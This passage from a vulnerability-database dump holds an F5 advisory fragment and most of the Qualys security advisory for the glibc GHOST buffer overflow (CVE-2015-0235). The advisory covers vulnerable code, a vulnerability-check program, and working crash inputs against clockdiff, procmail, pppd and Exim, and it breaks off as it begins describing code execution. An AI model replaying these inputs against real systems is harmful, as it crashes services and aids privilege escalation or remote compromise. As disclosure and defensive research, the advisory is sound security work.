system](<https://support.f5.com/csp/article/K13092>).\n\nFor information about using the BIG-IP ASM system and iRules to mitigate various GHOST exploits, refer to the [GHOST Vulnerability (CVE-2015-0235)](<https://devcentral.f5.com/articles/ghost-vulnerability-cve-2015-0235>) DevCentral article.\n\n**Note: **A DevCentral login is required to access this content.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K7312: Overview of the management port](<https://support.f5.com/csp/article/K7312>)\n", "modified": "2018-01-11T19:08:00", "published": "2015-01-28T03:29:00", "id": "F5:K16057", "href": "https://support.f5.com/csp/article/K16057", "title": "GHOST: glibc gethostbyname buffer overflow vulnerability CVE-2015-0235", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n\r\nQualys Security Advisory CVE-2015-0235\r\n\r\nGHOST: glibc gethostbyname buffer overflow\r\n\r\n\r\n--[ Contents ]----------------------------------------------------------------\r\n\r\n1 - Summary\r\n2 - Analysis\r\n3 - Mitigating factors\r\n4 - Case studies\r\n5 - Exploitation\r\n6 - Acknowledgments\r\n\r\n\r\n--[ 1 - Summary ]-------------------------------------------------------------\r\n\r\nDuring a code audit performed internally at Qualys, we discovered a\r\nbuffer overflow in the __nss_hostname_digits_dots() function of the GNU\r\nC Library (glibc). This bug is reachable both locally and remotely via\r\nthe gethostbyname*() functions, so we decided to analyze it -- and its\r\nimpact -- thoroughly, and named this vulnerability "GHOST".\r\n\r\nOur main conclusions are:\r\n\r\n- Via gethostbyname() or gethostbyname2(), the overflowed buffer is\r\n located in the heap. Via gethostbyname_r() or gethostbyname2_r(), the\r\n overflowed buffer is caller-supplied (and may therefore be located in\r\n the heap, stack, .data, .bss, etc; however, we have seen no such call\r\n in practice).\r\n\r\n- At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit\r\n machines, and 8 bytes on 64-bit machines). Bytes can be overwritten\r\n only with digits ('0'...'9'), dots ('.'), and a terminating null\r\n character ('\0').\r\n\r\n- Despite these limitations, arbitrary code execution can be achieved.\r\n As a proof of concept, we developed a full-fledged remote exploit\r\n against the Exim mail server, bypassing all existing protections\r\n (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will\r\n publish our exploit as a Metasploit module in the near future.\r\n\r\n- The first vulnerable version of the GNU C Library is glibc-2.2,\r\n released on November 10, 2000.\r\n\r\n- We identified a number of factors that mitigate the impact of this\r\n bug. In particular, we discovered that it was fixed on May 21, 2013\r\n (between the releases of glibc-2.17 and glibc-2.18). Unfortunately, it\r\n was not recognized as a security threat; as a result, most stable and\r\n long-term-support distributions were left exposed (and still are):\r\n Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7,\r\n Ubuntu 12.04, for example.\r\n\r\n\r\n--[ 2 - Analysis ]------------------------------------------------------------\r\n\r\nThe vulnerable function, __nss_hostname_digits_dots(), is called\r\ninternally by the glibc in nss/getXXbyYY.c (the non-reentrant version)\r\nand nss/getXXbyYY_r.c (the reentrant version). However, the calls are\r\nsurrounded by #ifdef HANDLE_DIGITS_DOTS, a macro defined only in:\r\n\r\n- inet/gethstbynm.c\r\n- inet/gethstbynm2.c\r\n- inet/gethstbynm_r.c\r\n- inet/gethstbynm2_r.c\r\n- nscd/gethstbynm3_r.c\r\n\r\nThese files implement the gethostbyname*() family, and hence the only\r\nway to reach __nss_hostname_digits_dots() and its buffer overflow. The\r\npurpose of this function is to avoid expensive DNS lookups if the\r\nhostname argument is already an IPv4 or IPv6 address.\r\n\r\nThe code below comes from glibc-2.17:\r\n\r\n 35 int\r\n 36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf,\r\n 37 char **buffer, size_t *buffer_size,\r\n 38 size_t buflen, struct hostent **result,\r\n 39 enum nss_status *status, int af, int *h_errnop)\r\n 40 {\r\n ..\r\n 57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':')\r\n 58 {\r\n 59 const char *cp;\r\n 60 char *hostname;\r\n 61 typedef unsigned char host_addr_t[16];\r\n 62 host_addr_t *host_addr;\r\n 63 typedef char *host_addr_list_t[2];\r\n 64 host_addr_list_t *h_addr_ptrs;\r\n 65 char **h_alias_ptr;\r\n 66 size_t size_needed;\r\n ..\r\n 85 size_needed = (sizeof (*host_addr)\r\n 86 + sizeof (*h_addr_ptrs) + strlen (name) + 1);\r\n 87\r\n 88 if (buffer_size == NULL)\r\n 89 {\r\n 90 if (buflen < size_needed)\r\n 91 {\r\n ..\r\n 95 goto done;\r\n 96 }\r\n 97 }\r\n 98 else if (buffer_size != NULL && *buffer_size < size_needed)\r\n 99 {\r\n100 char *new_buf;\r\n101 *buffer_size = size_needed;\r\n102 new_buf = (char *) realloc (*buffer, *buffer_size);\r\n103\r\n104 if (new_buf == NULL)\r\n105 {\r\n...\r\n114 goto done;\r\n115 }\r\n116 *buffer = new_buf;\r\n117 }\r\n...\r\n121 host_addr = (host_addr_t *) *buffer;\r\n122 h_addr_ptrs = (host_addr_list_t *)\r\n123 ((char *) host_addr + sizeof (*host_addr));\r\n124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));\r\n125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);\r\n126\r\n127 if (isdigit (name[0]))\r\n128 {\r\n129 for (cp = name;; ++cp)\r\n130 {\r\n131 if (*cp == '\0')\r\n132 {\r\n133 int ok;\r\n134\r\n135 if (*--cp == '.')\r\n136 break;\r\n...\r\n142 if (af == AF_INET)\r\n143 ok = __inet_aton (name, (struct in_addr *) host_addr);\r\n144 else\r\n145 {\r\n146 assert (af == AF_INET6);\r\n147 ok = inet_pton (af, name, host_addr) > 0;\r\n148 }\r\n149 if (! ok)\r\n150 {\r\n...\r\n154 goto done;\r\n155 }\r\n156\r\n157 resbuf->h_name = strcpy (hostname, name);\r\n...\r\n194 goto done;\r\n195 }\r\n196\r\n197 if (!isdigit (*cp) && *cp != '.')\r\n198 break;\r\n199 }\r\n200 }\r\n...\r\n\r\nLines 85-86 compute the size_needed to store three (3) distinct entities\r\nin buffer: host_addr, h_addr_ptrs, and name (the hostname). Lines 88-117\r\nmake sure the buffer is large enough: lines 88-97 correspond to the\r\nreentrant case, lines 98-117 to the non-reentrant case.\r\n\r\nLines 121-125 prepare pointers to store four (4) distinct entities in\r\nbuffer: host_addr, h_addr_ptrs, h_alias_ptr, and hostname. The sizeof\r\n(*h_alias_ptr) -- the size of a char pointer -- is missing from the\r\ncomputation of size_needed.\r\n\r\nThe strcpy() on line 157 should therefore allow us to write past the end\r\nof buffer, at most (depending on strlen(name) and alignment) 4 bytes on\r\n32-bit machines, or 8 bytes on 64-bit machines. There is a similar\r\nstrcpy() after line 200, but no buffer overflow:\r\n\r\n236 size_needed = (sizeof (*host_addr)\r\n237 + sizeof (*h_addr_ptrs) + strlen (name) + 1);\r\n...\r\n267 host_addr = (host_addr_t *) *buffer;\r\n268 h_addr_ptrs = (host_addr_list_t *)\r\n269 ((char *) host_addr + sizeof (*host_addr));\r\n270 hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs);\r\n...\r\n289 resbuf->h_name = strcpy (hostname, name);\r\n\r\nIn order to reach the overflow at line 157, the hostname argument must\r\nmeet the following requirements:\r\n\r\n- Its first character must be a digit (line 127).\r\n\r\n- Its last character must not be a dot (line 135).\r\n\r\n- It must comprise only digits and dots (line 197) (we call this the\r\n "digits-and-dots" requirement).\r\n\r\n- It must be long enough to overflow the buffer. For example, the\r\n non-reentrant gethostbyname*() functions initially allocate their\r\n buffer with a call to malloc(1024) (the "1-KB" requirement).\r\n\r\n- It must be successfully parsed as an IPv4 address by inet_aton() (line\r\n 143), or as an IPv6 address by inet_pton() (line 147). Upon careful\r\n analysis of these two functions, we can further refine this\r\n "inet-aton" requirement:\r\n\r\n . It is impossible to successfully parse a "digits-and-dots" hostname\r\n as an IPv6 address with inet_pton() (':' is forbidden). Hence it is\r\n impossible to reach the overflow with calls to gethostbyname2() or\r\n gethostbyname2_r() if the address family argument is AF_INET6.\r\n\r\n . Conclusion: inet_aton() is the only option, and the hostname must\r\n have one of the following forms: "a.b.c.d", "a.b.c", "a.b", or "a",\r\n where a, b, c, d must be unsigned integers, at most 0xfffffffful,\r\n converted successfully (ie, no integer overflow) by strtoul() in\r\n decimal or octal (but not hexadecimal, because 'x' and 'X' are\r\n forbidden).\r\n\r\n\r\n--[ 3 - Mitigating factors ]--------------------------------------------------\r\n\r\nThe impact of this bug is reduced significantly by the following\r\nreasons:\r\n\r\n- A patch already exists (since May 21, 2013), and has been applied and\r\n tested since glibc-2.18, released on August 12, 2013:\r\n\r\n [BZ #15014]\r\n * nss/getXXbyYY_r.c (INTERNAL (REENTRANT_NAME))\r\n [HANDLE_DIGITS_DOTS]: Set any_service when digits-dots parsing was\r\n successful.\r\n * nss/digits_dots.c (__nss_hostname_digits_dots): Remove\r\n redundant variable declarations and reallocation of buffer when\r\n parsing as IPv6 address. Always set NSS status when called from\r\n reentrant functions. Use NETDB_INTERNAL instead of TRY_AGAIN when\r\n buffer too small. Correct computation of needed size.\r\n * nss/Makefile (tests): Add test-digits-dots.\r\n * nss/test-digits-dots.c: New test.\r\n\r\n- The gethostbyname*() functions are obsolete; with the advent of IPv6,\r\n recent applications use getaddrinfo() instead.\r\n\r\n- Many programs, especially SUID binaries reachable locally, use\r\n gethostbyname() if, and only if, a preliminary call to inet_aton()\r\n fails. However, a subsequent call must also succeed (the "inet-aton"\r\n requirement) in order to reach the overflow: this is impossible, and\r\n such programs are therefore safe.\r\n\r\n- Most of the other programs, especially servers reachable remotely, use\r\n gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also\r\n known as full-circle reverse DNS) checks. These programs are generally\r\n safe, because the hostname passed to gethostbyname() has normally been\r\n pre-validated by DNS software:\r\n\r\n . "a string of labels each containing up to 63 8-bit octets, separated\r\n by dots, and with a maximum total of 255 octets." This makes it\r\n impossible to satisfy the "1-KB" requirement.\r\n\r\n . Actually, glibc's DNS resolver can produce hostnames of up to\r\n (almost) 1025 characters (in case of bit-string labels, and special\r\n or non-printable characters). But this introduces backslashes ('\\')\r\n and makes it impossible to satisfy the "digits-and-dots"\r\n requirement.\r\n\r\n\r\n--[ 4 - Case studies ]--------------------------------------------------------\r\n\r\nIn this section, we will analyze real-world examples of programs that\r\ncall the gethostbyname*() functions, but we first introduce a small test\r\nprogram that checks whether a system is vulnerable or not:\r\n\r\n[user@fedora-19 ~]$ cat > GHOST.c << EOF\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n#define CANARY "in_the_coal_mine"\r\n\r\nstruct {\r\n char buffer[1024];\r\n char canary[sizeof(CANARY)];\r\n} temp = { "buffer", CANARY };\r\n\r\nint main(void) {\r\n struct hostent resbuf;\r\n struct hostent *result;\r\n int herrno;\r\n int retval;\r\n\r\n /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/\r\n size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;\r\n char name[sizeof(temp.buffer)];\r\n memset(name, '0', len);\r\n name[len] = '\0';\r\n\r\n retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);\r\n\r\n if (strcmp(temp.canary, CANARY) != 0) {\r\n puts("vulnerable");\r\n exit(EXIT_SUCCESS);\r\n }\r\n if (retval == ERANGE) {\r\n puts("not vulnerable");\r\n exit(EXIT_SUCCESS);\r\n }\r\n puts("should not happen");\r\n exit(EXIT_FAILURE);\r\n}\r\nEOF\r\n\r\n[user@fedora-19 ~]$ gcc GHOST.c -o GHOST\r\n\r\nOn Fedora 19 (glibc-2.17):\r\n\r\n[user@fedora-19 ~]$ ./GHOST\r\nvulnerable\r\n\r\nOn Fedora 20 (glibc-2.18):\r\n\r\n[user@fedora-20 ~]$ ./GHOST\r\nnot vulnerable\r\n\r\n----[ 4.1 - The GNU C Library ]-----------------------------------------------\r\n\r\nThe glibc itself contains a few calls to gethostbyname*() functions. In\r\nparticular, getaddrinfo() calls gethostbyname2_r() if, but only if, a\r\nfirst call to inet_aton() fails: in accordance with the "inet-aton"\r\nrequirement, these internal calls are safe. For example,\r\neglibc-2.13/sysdeps/posix/getaddrinfo.c:\r\n\r\n at->family = AF_UNSPEC;\r\n ...\r\n if (__inet_aton (name, (struct in_addr *) at->addr) != 0)\r\n {\r\n if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)\r\n at->family = AF_INET;\r\n else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))\r\n {\r\n ...\r\n at->family = AF_INET6;\r\n }\r\n else\r\n return -EAI_ADDRFAMILY;\r\n ...\r\n }\r\n ...\r\n if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)\r\n {\r\n ...\r\n size_t tmpbuflen = 512;\r\n char *tmpbuf = alloca (tmpbuflen);\r\n ...\r\n rc = __gethostbyname2_r (name, family, &th, tmpbuf,\r\n tmpbuflen, &h, &herrno);\r\n ...\r\n }\r\n\r\n----[ 4.2 - mount.nfs ]-------------------------------------------------------\r\n\r\nSimilarly, mount.nfs (a SUID-root binary) is not vulnerable:\r\n\r\n if (inet_aton(hostname, &addr->sin_addr))\r\n return 0;\r\n if ((hp = gethostbyname(hostname)) == NULL) {\r\n nfs_error(_("%s: can't get address for %s\n"),\r\n progname, hostname);\r\n return -1;\r\n }\r\n\r\n----[ 4.3 - mtr ]-------------------------------------------------------------\r\n\r\nmtr (another SUID-root binary) is not vulnerable either, because it\r\ncalls getaddrinfo() instead of gethostbyname*() functions on any modern\r\n(ie, IPv6-enabled) system:\r\n\r\n#ifdef ENABLE_IPV6\r\n /* gethostbyname2() is deprecated so we'll use getaddrinfo() instead. */\r\n ...\r\n error = getaddrinfo( Hostname, NULL, &hints, &res );\r\n if ( error ) {\r\n if (error == EAI_SYSTEM)\r\n perror ("Failed to resolve host");\r\n else\r\n fprintf (stderr, "Failed to resolve host: %s\n", gai_strerror(error));\r\n exit( EXIT_FAILURE );\r\n }\r\n ...\r\n#else\r\n host = gethostbyname(Hostname);\r\n if (host == NULL) {\r\n herror("mtr gethostbyname");\r\n exit(1);\r\n }\r\n ...\r\n#endif\r\n\r\n----[ 4.4 - iputils ]---------------------------------------------------------\r\n\r\n------[ 4.4.1 - clockdiff ]---------------------------------------------------\r\n\r\nclockdiff is vulnerable in a straightforward manner:\r\n\r\n hp = gethostbyname(argv[1]);\r\n if (hp == NULL) {\r\n fprintf(stderr, "clockdiff: %s: host not found\n", argv[1]);\r\n exit(1);\r\n }\r\n\r\n[user@fedora-19-32b ~]$ ls -l /usr/sbin/clockdiff\r\n-rwxr-xr-x. 1 root root 15076 Feb 1 2013 /usr/sbin/clockdiff\r\n\r\n[user@fedora-19-32b ~]$ getcap /usr/sbin/clockdiff\r\n/usr/sbin/clockdiff = cap_net_raw+ep\r\n\r\n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x10000-16*1-2*4-1-4))"`\r\n.Segmentation fault\r\n\r\n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x20000-16*1-2*4-1-4))"`\r\nSegmentation fault\r\n\r\n[user@fedora-19-32b ~]$ dmesg\r\n...\r\n[202071.118929] clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000]\r\n[202086.144336] clockdiff[3618]: segfault at b90d0d24 ip b75bb0c6 sp bf8e9dc0 error 6 in libc-2.17.so[b7544000+1b8000]\r\n\r\n------[ 4.4.2 - ping and arping ]---------------------------------------------\r\n\r\nping and arping call gethostbyname() and gethostbyname2(), respectively,\r\nif and only if inet_aton() fails first. This time, however, there is\r\nanother function call in between (Fedora, for example, does define\r\nUSE_IDN):\r\n\r\n--------[ 4.4.2.1 - ping ]----------------------------------------------------\r\n\r\n if (inet_aton(target, &whereto.sin_addr) == 1) {\r\n ...\r\n } else {\r\n char *idn;\r\n#ifdef USE_IDN\r\n int rc;\r\n ...\r\n rc = idna_to_ascii_lz(target, &idn, 0);\r\n if (rc != IDNA_SUCCESS) {\r\n fprintf(stderr, "ping: IDN encoding failed: %s\n", idna_strerror(rc));\r\n exit(2);\r\n }\r\n#else\r\n idn = target;\r\n#endif\r\n hp = gethostbyname(idn);\r\n\r\n--------[ 4.4.2.2 - arping ]--------------------------------------------------\r\n\r\n if (inet_aton(target, &dst) != 1) {\r\n struct hostent *hp;\r\n char *idn = target;\r\n#ifdef USE_IDN\r\n int rc;\r\n\r\n rc = idna_to_ascii_lz(target, &idn, 0);\r\n\r\n if (rc != IDNA_SUCCESS) {\r\n fprintf(stderr, "arping: IDN encoding failed: %s\n", idna_strerror(rc));\r\n exit(2);\r\n }\r\n#endif\r\n\r\n hp = gethostbyname2(idn, AF_INET);\r\n\r\n--------[ 4.4.2.3 - Analysis ]------------------------------------------------\r\n\r\nIf idna_to_ascii_lz() modifies the target hostname, the first call to\r\ninet_aton() could fail and the second call (internal to gethostbyname())\r\ncould succeed. For example, idna_to_ascii_lz() transforms any Unicode\r\ndot-like character (0x3002, 0xFF0E, 0xFF61) into an ASCII dot (".").\r\n\r\nBut it also restricts the length of a domain label to 63 characters:\r\nthis makes it impossible to reach 1024 bytes (the "1-KB" requirement)\r\nwith only 4 labels and 3 dots (the "inet-aton" requirement).\r\n\r\nUnless inet_aton() (actually, strtoul()) can be tricked into accepting\r\nmore than 3 dots? Indeed, idna_to_ascii_lz() does not restrict the total\r\nlength of a domain name. glibc supports "thousands' grouping characters"\r\n(man 3 printf); for example, sscanf(str, "%'lu", &ul) yields 1000 when\r\nprocessing any of the following input strings:\r\n\r\n- "1,000" in an English locale;\r\n- "1 000" in a French locale; and\r\n- "1.000" in a German or Spanish locale.\r\n\r\nstrtoul() implements this "number grouping" too, but its use is limited\r\nto internal glibc functions. Conclusion: more than 3 dots is impossible,\r\nand neither ping nor arping is vulnerable.\r\n\r\n----[ 4.5 - procmail ]--------------------------------------------------------\r\n\r\nprocmail (a SUID-root and SGID-mail binary) is vulnerable through its\r\n"comsat/biff" feature:\r\n\r\n#define COMSAThost "localhost" /* where the biff/comsat daemon lives */\r\n...\r\n#define SERV_ADDRsep '@' /* when overriding in COMSAT=serv@addr */\r\n\r\nint setcomsat(chp)const char*chp;\r\n{ char*chad; ...\r\n chad=strchr(chp,SERV_ADDRsep); /* @ separator? */\r\n ...\r\n if(chad)\r\n *chad++='\0'; /* split the specifier */\r\n if(!chad||!*chad) /* no host */\r\n#ifndef IP_localhost /* Is "localhost" preresolved? */\r\n chad=COMSAThost; /* nope, use default */\r\n#else /* IP_localhost */\r\n { ...\r\n }\r\n else\r\n#endif /* IP_localhost */\r\n { ...\r\n if(!(host=gethostbyname(chad))||!host->h_0addr_list)\r\n\r\nuser@debian-7-2-32b:~$ ls -l /usr/bin/procmail\r\n-rwsr-sr-x 1 root mail 83912 Jun 6 2012 /usr/bin/procmail\r\n\r\nuser@debian-7-2-32b:~$ /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null\r\n...\r\n*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0980de30 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb76b2f01]\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb76b4768]\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb76b781d]\r\n/usr/bin/procmail[0x80548ec]\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7658e46]\r\n/usr/bin/procmail[0x804bb55]\r\n======= Memory map: ========\r\n...\r\n0980a000-0982b000 rw-p 00000000 00:00 0 [heap]\r\n...\r\nAborted\r\n\r\nuser@debian-7-2-32b:~$ _COMSAT_='COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"`\r\n\r\nuser@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_" "$_COMSAT_"1234 < /dev/null\r\nSegmentation fault\r\n\r\nuser@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_"12345670 "$_COMSAT_"123456701234 < /dev/null\r\nSegmentation fault\r\n\r\nuser@debian-7-2-32b:~$ dmesg\r\n...\r\n[211409.564917] procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000]\r\n[211495.820710] procmail[4559]: segfault at b8cb290c ip b763c5a4 sp bf870c98 error 4 in libc-2.13.so[b75ca000+15c000]\r\n\r\n----[ 4.6 - pppd ]------------------------------------------------------------\r\n\r\npppd (yet another SUID-root binary) calls gethostbyname() if a\r\npreliminary call to inet_addr() (a simple wrapper around inet_aton())\r\nfails. "The inet_addr() function converts the Internet host address cp\r\nfrom IPv4 numbers-and-dots notation into binary data in network byte\r\norder. If the input is invalid, INADDR_NONE (usually -1) is returned.\r\nUse of this function is problematic because -1 is a valid address\r\n(255.255.255.255)." A failure for inet_addr(), but a success for\r\ninet_aton(), and consequently a path to the buffer overflow.\r\n\r\nuser@ubuntu-12-04-32b:~$ ls -l /usr/sbin/pppd\r\n-rwsr-xr-- 1 root dip 273272 Feb 3 2011 /usr/sbin/pppd\r\n\r\nuser@ubuntu-12-04-32b:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)\r\n\r\n------[ 4.6.1 - ms-dns option ]-----------------------------------------------\r\n\r\nstatic int\r\nsetdnsaddr(argv)\r\n char **argv;\r\n{\r\n u_int32_t dns;\r\n struct hostent *hp;\r\n\r\n dns = inet_addr(*argv);\r\n if (dns == (u_int32_t) -1) {\r\n if ((hp = gethostbyname(*argv)) == NULL) {\r\n option_error("invalid address parameter '%s' for ms-dns option",\r\n *argv);\r\n return 0;\r\n }\r\n dns = *(u_int32_t *)hp->h_addr;\r\n }\r\n\r\nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'\r\n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09c0f928 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb75e1ee2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb75d1db5]\r\n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75d1deb]\r\n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]\r\n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]\r\n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]\r\n/usr/sbin/pppd(main+0x1cf)[0x8050b2f]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb75854d3]\r\n======= Memory map: ========\r\n...\r\n09c0c000-09c2d000 rw-p 00000000 00:00 0 [heap]\r\n...\r\nAborted (core dumped)\r\n\r\n------[ 4.6.2 - ms-wins option ]----------------------------------------------\r\n\r\nstatic int\r\nsetwinsaddr(argv)\r\n char **argv;\r\n{\r\n u_int32_t wins;\r\n struct hostent *hp;\r\n\r\n wins = inet_addr(*argv);\r\n if (wins == (u_int32_t) -1) {\r\n if ((hp = gethostbyname(*argv)) == NULL) {\r\n option_error("invalid address parameter '%s' for ms-wins option",\r\n *argv);\r\n return 0;\r\n }\r\n wins = *(u_int32_t *)hp->h_addr;\r\n }\r\n\r\nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-wins' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'\r\n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x08a64928 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb757aee2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb756adb5]\r\n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb756adeb]\r\n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]\r\n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]\r\n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]\r\n/usr/sbin/pppd(main+0x1cf)[0x8050b2f]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb751e4d3]\r\n======= Memory map: ========\r\n...\r\n08a61000-08a82000 rw-p 00000000 00:00 0 [heap]\r\n...\r\nAborted (core dumped)\r\n\r\n------[ 4.6.3 - socket option ]-----------------------------------------------\r\n\r\nstatic int\r\nopen_socket(dest)\r\n char *dest;\r\n{\r\n char *sep, *endp = NULL;\r\n int sock, port = -1;\r\n u_int32_t host;\r\n struct hostent *hent;\r\n ...\r\n sep = strchr(dest, ':');\r\n if (sep != NULL)\r\n port = strtol(sep+1, &endp, 10);\r\n if (port < 0 || endp == sep+1 || sep == dest) {\r\n error("Can't parse host:port for socket destination");\r\n return -1;\r\n }\r\n *sep = 0;\r\n host = inet_addr(dest);\r\n if (host == (u_int32_t) -1) {\r\n hent = gethostbyname(dest);\r\n if (hent == NULL) {\r\n error("%s: unknown host in socket option", dest);\r\n *sep = ':';\r\n return -1;\r\n }\r\n host = *(u_int32_t *)(hent->h_addr_list[0]);\r\n }\r\n\r\nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'socket' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255:1'\r\nuser@ubuntu-12-04-32b:~$ *** glibc detected *** /usr/sbin/pppd: malloc(): memory corruption: 0x09cce270 ***\r\n\r\n----[ 4.7 - Exim ]------------------------------------------------------------\r\n\r\nThe Exim mail server is exploitable remotely if configured to perform\r\nextra security checks on the HELO and EHLO commands ("helo_verify_hosts"\r\nor "helo_try_verify_hosts" option, or "verify = helo" ACL); we developed\r\na reliable and fully-functional exploit that bypasses all existing\r\nprotections (ASLR, PIE, NX) on 32-bit and 64-bit machines.\r\n\r\nuser@debian-7-7-64b:~$ grep helo /var/lib/exim4/config.autogenerated | grep verify\r\nhelo_verify_hosts = *\r\n\r\nuser@debian-7-7-64b:~$ python -c "print '0' * $((0x500-16*1-2*8-1-8))"\r\n000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n\r\nuser@debian-7-7-64b:~$ telnet 127.0.0.1 25\r\nTrying 127.0.0.1...\r\nConnected to 127.0.0.1.\r\nEscape character is '^]'.\r\n220 debian-7-7-64b ESMTP Exim 4.80 ...\r\nHELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\nConnection closed by foreign host.\r\n\r\nuser@debian-7-7-64b:~$ dmesg\r\n...\r\n[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]\r\n\r\n\r\n--[ 5 - Exploitation ]--------------------------------------------------------\r\n\r\n----[ 5.1 - Code execution ]--------------------------------------------------\r\n\r\nIn this section, we describe how we achieve remote code execution\r\nagainst the Exim SMTP mail server, bypassing the NX (No-eXecute)\r\nprotection and glibc's malloc hardening.\r\n\r\nFirst, we overflow gethostbyname's heap-based buffer and partially\r\noverwrite the size field of the next contiguous free 